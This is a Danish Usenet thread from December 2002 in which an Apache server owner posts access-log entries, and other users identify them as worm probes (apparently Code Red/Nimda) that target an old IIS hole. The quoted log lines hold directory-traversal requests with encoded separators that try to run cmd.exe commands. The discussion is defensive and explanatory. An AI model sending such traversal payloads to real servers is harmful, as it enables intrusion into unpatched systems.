---

hej ng.
Dette er taget fra min acces_log på min apache server.
Så vidt jeg kan se er det nogen der prøver at fyre nogle windows
kommandoer af, men er det mig der tager fejl - eller hvad?

62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 329
62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
/scripts/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/winnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 400 303
62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
/IISADMPWD/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/winnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 400 303
62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
/msadc/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/winnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 400 303
62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
/cgi-bin/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/winnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 400 303
62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
/_vti_bin/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/winnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 400 303
62.243.59.6 - - [24/Dec/2002:13:04:46 +0100] "GET /default.asp+.htr
HTTP/1.0" 404 286


Håber i kan hjælpe

/Kasper

---

"Kasper" <knl@oncable.dk> skrev i en meddelelse
news:fqbp0vgbad2k7iopgc7j9fd7bj6eajdaap@4ax.com...
> hej ng.
> Dette er taget fra min acces_log på min apache server.
> Så vidt jeg kan se er det nogen der prøver at fyre nogle windows
> kommandoer af, men er det mig der tager fejl - eller hvad?
>
> 62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
> /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 329
> 62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
>
/scripts/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/wi
nnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 400 303
> 62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
>
/IISADMPWD/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/
winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 400 303
> 62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
>
/msadc/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/winn
t/system32/cmd.exe?/c%20dir
> HTTP/1.0" 400 303
> 62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
>
/cgi-bin/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/wi
nnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 400 303
> 62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
>
/_vti_bin/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/w
innt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 400 303
> 62.243.59.6 - - [24/Dec/2002:13:04:46 +0100] "GET /default.asp+.htr
> HTTP/1.0" 404 286
>

Det er ubudne gæster, der prøver at få en kommando promt

Per

---

On Fri, 27 Dec 2002 21:07:13 +0100, "P og T" <nix@ikke.her> wrote:

>
>"Kasper" <knl@oncable.dk> skrev i en meddelelse
>news:fqbp0vgbad2k7iopgc7j9fd7bj6eajdaap@4ax.com...
>> hej ng.
>> Dette er taget fra min acces_log på min apache server.
>> Så vidt jeg kan se er det nogen der prøver at fyre nogle windows
>> kommandoer af, men er det mig der tager fejl - eller hvad?
>>
>> 62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
>> /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>> HTTP/1.0" 404 329
>> 62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
>>
>/scripts/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/wi
>nnt/system32/cmd.exe?/c%20dir
>> HTTP/1.0" 400 303
>> 62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
>>
>/IISADMPWD/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/
>winnt/system32/cmd.exe?/c%20dir
>> HTTP/1.0" 400 303
>> 62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
>>
>/msadc/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/winn
>t/system32/cmd.exe?/c%20dir
>> HTTP/1.0" 400 303
>> 62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
>>
>/cgi-bin/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/wi
>nnt/system32/cmd.exe?/c%20dir
>> HTTP/1.0" 400 303
>> 62.243.59.6 - - [24/Dec/2002:13:04:45 +0100] "GET
>>
>/_vti_bin/..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v/w
>innt/system32/cmd.exe?/c%20dir
>> HTTP/1.0" 400 303
>> 62.243.59.6 - - [24/Dec/2002:13:04:46 +0100] "GET /default.asp+.htr
>> HTTP/1.0" 404 286
>>
>
>Det er ubudne gæster, der prøver at få en kommando promt

hmm - er det helt normalt at det sker hele tiden. Jeg kan se at den
har været udsat stort set hele tiden (af en del forskellige ip'er)
siden den blev sat i luften, og den kører endda uden noget domænenavn,
men kun på ip nummer.
>
>Per
>

---

Kasper skrev Fredag den 27. december 2002 21:12 i
dk.edb.system.unix:


>>Det er ubudne gæster, der prøver at få en kommando promt
> hmm - er det helt normalt at det sker hele tiden. Jeg kan se at
> den har været udsat stort set hele tiden (af en del forskellige
> ip'er) siden den blev sat i luften, og den kører endda uden noget
> domænenavn, men kun på ip nummer.

Det er en orm, den har forsøgt sig med din IP før, der har du måske
bare ikke haft en server kørende på port 80, det er helt normalt,
og hvis du bare sørger for at have din server opdateret, med sidste
sikkerhedsopdateringer, så sker der ikke noget. Men ireterende at
få fyldt sin log med det det er det.

--
Med venlig hilsen

Ivar Madsen

---

"Ivar Madsen" <news-23-08-02@milli.dk> skrev i en meddelelse
news:2793557.AKlu0OVqFS@news.milli.dk...
> og hvis du bare sørger for at have din server opdateret, med sidste
> sikkerhedsopdateringer, så sker der ikke noget. Men ireterende at
> få fyldt sin log med det det er det.
Nu behøver han ikke at opdatere sin server i dette tilfælde, da det ikke
er en IIS, han har.. men irriterende er det da, at se alle de filer i
sin logfil.. (og statistik-sider)

Thomas

--
404 file not found

---

Thomas Jensen skrev Fredag den 27. december 2002 21:39 i
dk.edb.system.unix:

>> og hvis du bare sørger for at have din server opdateret, med
>> sidste sikkerhedsopdateringer, så sker der ikke noget. Men
>> ireterende at få fyldt sin log med det det er det.
> Nu behøver han ikke at opdatere sin server i dette tilfælde, da
> det ikke er en IIS, han har.. men irriterende er det da, at se
> alle de filer i sin logfil.. (og statistik-sider)

Jeg har heller aldrig installeret IIS, og mener ikke at WIN XP H.
gjorde det selv under install af OS. Jeg havde Apache til WIN
kørende, alene det må gøre at selvom WIN selv havde installeret
IIS, så kunne den ikke køre, da der var en anden server der kørte
på port 80, enig?

Jeg har altid passet på hvorledes jeg har færdes på nettet, for at
undgå virus (herunder regner jeg orme).
Ikke destro mindre skete det endag at jeg fik en e-mail fra en, der
mente at kunne genkende min IP, da han var ved at lægge de IP'er
der fylder op i hans' web server's, og ganske regtigt den var
blevet inficeret, det er alså ikke kun IIS server der kan blive
inficeret med de orme, omend jeg ikke har kendskab til nogen der
køre under Linux,,,

BTW 3-4 uger sener fik jeg en henvendelse fra TDC's abuse, om at min
maskine var inficeret med en orm,,, De *er* alså ikke så hurtig, på
det tidspunkt var den clean

--
Med venlig hilsen

Ivar Madsen

---

"Ivar Madsen" <news-23-08-02@milli.dk> skrev i en meddelelse
news:74368881.KISFGYC6A6@news.milli.dk...
> Jeg har heller aldrig installeret IIS, og mener ikke at WIN XP H.
> gjorde det selv under install af OS. Jeg havde Apache til WIN
> kørende, alene det må gøre at selvom WIN selv havde installeret
> IIS, så kunne den ikke køre, da der var en anden server der kørte
> på port 80, enig?
Det burde give en konflikt af en slags, hvis de begge skulle køre på
samme port..

> Jeg har altid passet på hvorledes jeg har færdes på nettet, for at
> undgå virus (herunder regner jeg orme).
Det samme her..

> Ikke destro mindre skete det endag at jeg fik en e-mail fra en, der
> mente at kunne genkende min IP, da han var ved at lægge de IP'er
> der fylder op i hans' web server's, og ganske regtigt den var
> blevet inficeret, det er alså ikke kun IIS server der kan blive
> inficeret med de orme, omend jeg ikke har kendskab til nogen der
> køre under Linux,,,
Hmm, jeg er ret sikker på at det var en IIS fejl, som den orm udnyttede,
har selv kunne aflæse det i mine logfiler..., og jeg har ikke modtaget
nogle mails af slagsen, du lyder til at have modtaget... (BSD)

> BTW 3-4 uger sener fik jeg en henvendelse fra TDC's abuse, om at min
> maskine var inficeret med en orm,,, De *er* alså ikke så hurtig, på
> det tidspunkt var den clean
Mindre optimalt...

Thomas

--
404 file not found

---

Ivar Madsen wrote in <74368881.KISFGYC6A6@news.milli.dk>:
> Ikke destro mindre skete det endag at jeg fik en e-mail fra en, der
> mente at kunne genkende min IP, da han var ved at lægge de IP'er
> der fylder op i hans' web server's, og ganske regtigt den var
> blevet inficeret, det er alså ikke kun IIS server der kan blive
> inficeret med de orme, omend jeg ikke har kendskab til nogen der
> køre under Linux,,,

Jeg tror vist der er en eller flere orme som kombinerer flere
angrebsmetoder. IIS-huller er én metode, derudover bruges vist emails og
Microsoft-fildelings-netværk.

FUT: dk.edb.sikkerhed.virus

--
Mvh.

Niels Andersen
Linux 2.4.19 - Debian testing/unstable

---

Ivar Madsen wrote:
> Thomas Jensen skrev Fredag den 27. december 2002 21:39 i
> dk.edb.system.unix:
>
>
>>>og hvis du bare sørger for at have din server opdateret, med
>>>sidste sikkerhedsopdateringer, så sker der ikke noget. Men
>>>ireterende at få fyldt sin log med det det er det.
>>
>>Nu behøver han ikke at opdatere sin server i dette tilfælde, da
>>det ikke er en IIS, han har.. men irriterende er det da, at se
>>alle de filer i sin logfil.. (og statistik-sider)
>
>
> Jeg har heller aldrig installeret IIS, og mener ikke at WIN XP H.
> gjorde det selv under install af OS. Jeg havde Apache til WIN
> kørende, alene det må gøre at selvom WIN selv havde installeret
> IIS, så kunne den ikke køre, da der var en anden server der kørte
> på port 80, enig?
>
> Jeg har altid passet på hvorledes jeg har færdes på nettet, for at
> undgå virus (herunder regner jeg orme).
> Ikke destro mindre skete det endag at jeg fik en e-mail fra en, der
> mente at kunne genkende min IP, da han var ved at lægge de IP'er
> der fylder op i hans' web server's, og ganske regtigt den var
> blevet inficeret, det er alså ikke kun IIS server der kan blive
> inficeret med de orme, omend jeg ikke har kendskab til nogen der
> køre under Linux,,,
>
> BTW 3-4 uger sener fik jeg en henvendelse fra TDC's abuse, om at min
> maskine var inficeret med en orm,,, De *er* alså ikke så hurtig, på
> det tidspunkt var den clean
>
Min statestik ser således ud (Linux -> Apache):

Hits      5945   100%
Bad      397   6.6778805719092%
Worms      4415   74.264087468461%
Internal   1013   17.03952901598%
Visits      120   2.0185029436501%

Loggen start fra den 3. Oktober 2002, server adressen (ip'en) har aldrig
været publiseret...


Hvilken orm fik du????

Cheers, Frank

---

Frank Nielsen skrev Lørdag den 28. december 2002 14:40 i
dk.edb.system.unix:


> Hvilken orm fik du????

Jeg må tilstå at jeg kan ikke huske det længer


--
Med venlig hilsen

Ivar Madsen

---

Frank Nielsen <frank.nielsen@[pleaseNOspam]rocketmail.com> writes:

> Loggen start fra den 3. Oktober 2002, server adressen (ip'en) har
> aldrig været publiseret...

Det er ligegyldigt om IP-adressen har været publiceret. De fleste af
de der orme prøver blot tilfældige IP-adresser.

--
Jacob - www.bunk.cc
It's not the fall that kills you, it's the landing.

---

Kasper <knl@oncable.dk> writes:

> hej ng.
> Dette er taget fra min acces_log på min apache server.
> Så vidt jeg kan se er det nogen der prøver at fyre nogle windows
> kommandoer af, men er det mig der tager fejl - eller hvad?
[klip]
> Håber i kan hjælpe

Det er nogen som prøver at udnytte et gammelt hul i IIS til at
eksekvere vilkårlige kommandoer

Så vidt jeg husker så er der en orm som bruger det hul.

--
Rasmus Meldgaard

Jeg har endnu ikke fundet en netbank der duer med lynx. Havde bankerne dog
bare nogle pornobilleder der kunne retfærdiggøre det der GUI, så hjalp det
lidt på det, men nej.
-- Hans Schou

---

"Kasper" <knl@oncable.dk> skrev i en meddelelse
news:fqbp0vgbad2k7iopgc7j9fd7bj6eajdaap@4ax.com...
> 62.243.59.6 - - [24/Dec/2002:13:04:46 +0100] "GET /default.asp+.htr
> HTTP/1.0" 404 286
>
>
> Håber i kan hjælpe
Hvis jeg ikke husker meget forkert, er det code red/nimbus ormen, der
efterlader dette spor..

Thomas

--
404 file not found

---

Fri, 27 Dec 2002 21:12:38 +0100
skrev Kasper <knl@oncable.dk>:

> hmm - er det helt normalt at det sker hele tiden.
>
Normalt og normalt.

Jeg prøvede at checke min log opsamlet siden 27-05-2002 og jeg har haft
11.341 af disse "hits" fra 421 forskellige IP-adresser.

Det svarer til 1.620 om måneden eller ca. 50 om dagen eller ca. 2 i timen
i gennensnit.

Men det kommer i klumper, for jeg har alene haft 125 fra 3 forskellige IP
adresser den 27-12-2002.

Her en liste med antal pr. måned:

May 28
Jun 191
Jul 509
Aug 997
Sep 3273
Oct 2784
Nov 2268
Dec 1291

Når man ser på antal forsøg pr. IP-adresse så slår antal 14, 28, 602 og
630 tydeligt igennem. Sjovt nok deleligt med 7 alle sammen.

--
Med venlig hilsen / Best regards / Mit freundlichen Grüssen

Andreas Hinz